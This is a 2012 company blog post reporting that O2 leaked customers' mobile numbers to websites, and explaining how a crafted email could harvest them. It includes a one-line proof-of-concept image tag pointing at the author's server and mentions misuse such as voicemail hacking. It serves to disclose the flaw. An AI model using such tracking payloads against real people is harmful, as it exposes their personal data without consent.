O2 - "We're better...connected"

24 January 2012

News broke on Twitter this morning that telecoms giant O2 have been inadvertently sending out customers phone numbers to every website they visit. O2 have yet to come back with an official explanation but it would seem to be an error.

Industry expert and Glow Technical Director, Thom Shannon, realised that a consequence of this allows anyone to collect mobile phone numbers from O2 iPhone customers, simply by sending them an email.

“Potentially, this would allow spammers, unscrupulous websites and basically anyone else to very easily harvest lists of phone numbers” Commented Thom Shannon. “From O2’s customer point of view that’s very worrying. Phone numbers are normally hard to get hold of, used in personally identifying individuals and frequently abused by spammers”

The issue was first demonstrated by Lewis Peckover with this simple demonstration page. Our Technical Director Thom Shannon has since shown how it could be used to get phone numbers from individuals email addresses. A malicious attacker can send it out a carefully crafted email to any number of people. Anyone viewing it on their phone would inadvertently reveal their mobile phone number to the attacker.

To see a demonstration of this, the following image code can be embedded in an email, if that email is read on a mobile over O2 3G, the image should show that phones number. We're not logging anything on our server, but we can't say the same about anyone else!

<img src="http://assets.glow-internet.com/mob.aspx" />

Thom Shannon added "This approach could be used to augment a stolen database with mobile numbers, allowing a malcious individual to scam people more effectively. It could even be used by an investigator with a celebrities email address to get their phone number and hack into their voicemail!"

You can read the full story covered by Internet Industry website TheNextWeb